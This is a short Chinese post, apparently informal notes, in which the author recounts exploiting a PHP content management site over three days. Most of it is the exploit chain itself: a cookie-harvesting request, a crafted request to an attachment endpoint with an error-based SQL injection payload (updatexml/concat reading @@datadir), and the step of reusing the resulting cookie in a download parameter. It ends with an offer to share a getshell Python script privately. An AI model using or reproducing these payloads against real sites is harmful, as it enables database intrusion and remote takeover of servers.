弄了3天了 这个点 总结一下这三天的坑吧
0X01 注入点入手
/index.php?m=wap&c=index&a=init&siteid=1 获取cookie
传给
userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4
然后 构造SQL语句
/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+@@datadir+limit+0%2c1)))%2c1)%23%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%26
得到cookie
在构造传给a_k参数
/index.php?m=content&c=down&a_k=
2前台getshell附件在我的机器里面 要得可以私信我 py脚本
太菜了 多学习